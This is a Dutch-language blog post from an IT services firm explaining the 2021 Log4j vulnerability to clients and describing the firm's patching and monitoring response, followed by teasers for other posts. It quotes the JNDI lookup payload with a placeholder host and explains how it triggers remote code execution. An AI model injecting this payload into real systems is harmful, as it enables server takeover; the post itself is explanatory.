Log4j beveiligingslek

7 januari 2022

Waarschijnlijk heeft u in de media afgelopen weken wel het één en ander voorbij zien komen. Er is een kritieke kwetsbaarheid gevonden in wereldwijd gebruikte software waar u waarschijnlijk nog nooit van gehoord heeft Log4j. Daarom eerst wat uitleg;

Log4j is in een gigantische hoeveelheid platformen, apps en diensten verwerkt. Software van Cisco, IBM, VMware, Fortinet en Red Hat zijn enkele voorbeelden. De precieze toepassing van de library verschilt, maar de registratie van gebeurtenissen in applicaties speelt altijd een rol. Denk aan het noteren van inlogpogingen of de identiteit van de gebruiker van een applicatie.

De applicatie verwerkt een gebeurtenis; Log4j draait data uit. De programmeur van de applicatie bepaalt welke data. Dat kan zoals eerdergenoemd de gebruikersnaam van een gepoogde inlog zijn. Of de tijd waarop een gebruiker inlogt.

De kwetsbaarheid waarop Alibaba’s securityteam stuitte (zij hebben het ontdekt) komt voort uit een wisselwerking tussen programmeertaal Java en library Log4j. Java is in combinatie met Log4j in staat om code in een server op afstand uit te voeren. Daarvoor geven programmeurs de volgende regel mee: ${jndi:ldap://voorbeeld.com/vaneenurl}. De daadwerkelijke url is vervangbaar met het adres van een server naar keuze. Voer je de regel in een Java-applicatie uit, dan probeert de applicatie de data van de gespecificeerde url uit te voeren.

Dit is geen kwetsbaarheid op zich, want in een wenselijk praktijkscenario’s heeft alleen een gemachtigde administrator de mogelijkheid om de regel in een applicatie toe te voegen. Het probleem begint bij Log4j. Draait Log4j de regel uit, dan interpreteert Java precies dezelfde opdracht als een regel die doelgericht door een ontwikkelaar in de applicatie is geplaatst.

Stel dat Log4j is ingesteld om de inhoud van een chatbericht op een online spel te loggen. Een gebruiker van het spel verstuurt de bovengenoemde regel in een chatbericht. De url verwijst naar een server met instructies voor de uitvoering van een malware-applicatie. Log4j draait de regel uit. Java interpreteert een opdracht – en volgt de opdracht netjes op. De gebruiker slaagt in het hacken van de server, zonder ook maar een enkel wachtwoord te hoeven bemachtigen.

Ook heeft het Nationaal Cyber Security Centrum (NCSC) waarschuwt (onderdeel van het ministerie van Justitie en Veiligheid) dat de computersystemen van bijna alle bedrijven en instellingen mogelijk geraakt kunnen worden. Natuurlijk hebben wij hier direct actie op ondernomen.

Wij zijn voor onze klanten, waarvan wij actief hun ICT omgeving beheren, de afgelopen weken heel druk bezig geweest met het in kaart brengen van de problematieken en het inventariseren van mogelijke risico’s. In gevallen waar de betreffende kwetsbaarheid mogelijk (vroeg of laat) van toepassing kan zijn, hebben wij in overleg en afstemming met applicatieleveranciers en softwareleveranciers, de benodigde maatregelen getroffen om dit Log4J lek te dichten. Ook heeft onze monitoring een extra update gekregen welke scant op het kunnen misbruiken van het Log4j beveiligingslek en zijn onze managed firewalls uitgerust met de juiste update definities om een dergelijke aanval te detecteren en blokkeren.

Uiteraard blijft het zaak in de huidige wereld, met toenemende cyber-dreiging, om scherp te blijven en zorg te dragen voor juiste beveiligingsmaatregelen, bewustzijn bij personeel en actief beheer van uw ICT omgeving. Twijfelt u of Log4j binnen uw omgeving voor schade kan zorgen of bent u benieuwd naar welke maatregelen er te nemen zijn om ‘de beveiligingsdrempel’ hoger te leggen, dan kunt u natuurlijk (#superlogisch) een beroep doen op Analyst ICT.

Laatste blogs

Blog

Apple 50 jaar: 50 jaar anders durven denken

Dit jaar bestaat Apple 50 jaar. Een mijlpaal waar je niet zomaar aan voorbijgaat. Want of u nu fan bent of niet: Apple heeft de manier waarop wij werken, communiceren en creëren blijvend veranderd. Bij Analyst ICT zijn wij trots dat wij onderdeel mogen zijn van dit ecosysteem. Als Apple Technical Partner werken wij dagelijks met technologie die niet alleen krachtig is, maar vooral ook logisch en prettig in gebruik. Anders kijken naar technologie Apple heeft zich altijd onderscheiden door één simpele overtuiging: technologie moet mensen helpen, niet tegenwerken. Geen overbodige complexiteit, maar eenvoud en gebruiksgemak. Dat sluit naadloos aan...

Blog

Waarom het opslaan van wachtwoorden in uw browser geen goed idee is

Onderstaand blog artikel kwam tot stand door een vraag op ons engineer overleg. Iedere twee weken overleggen wij met al onze technische mensen over de laatste ontwikkelingen in de techniek of bij klanten. Hier komen ook goede klantvragen naar voren zoals deze. Tijd om op onderzoek uit te gaan. Dankjewel Wiebe! U herkent het vast: u logt in op een website en uw browser vraagt of hij het wachtwoord moet onthouden. Handig, snel en u hoeft niets te onthouden. Toch zit daar een risico.Wij zien in de praktijk dat veel beveiligingsincidenten beginnen bij iets kleins. Zoals het opslaan van wachtwoorden...

Blog

Apple zet een grote stap met Apple Business

Apple heeft deze week iets bijzonders aangekondigd. Geen nieuw apparaat, maar iets wat voor veel organisaties misschien nog wel interessanter is: Apple Business. Een compleet nieuw platform waarmee Apple al zijn zakelijke diensten samenbrengt in één omgeving. En eerlijk is eerlijk: dit is een ontwikkeling die wij bij Analyst ICT met veel interesse volgen. Het probleem: versnipperde tools en onnodige complexiteit Veel organisaties die met Apple werken, herkennen het probleem: Meerdere portals (Apple Business Manager, Business Essentials, Connect) Verschillende tools voor beheer, branding en support Extra kosten voor basisfunctionaliteiten zoals device management Dat zorgt voor onoverzichtelijkheid en kost tijd. En...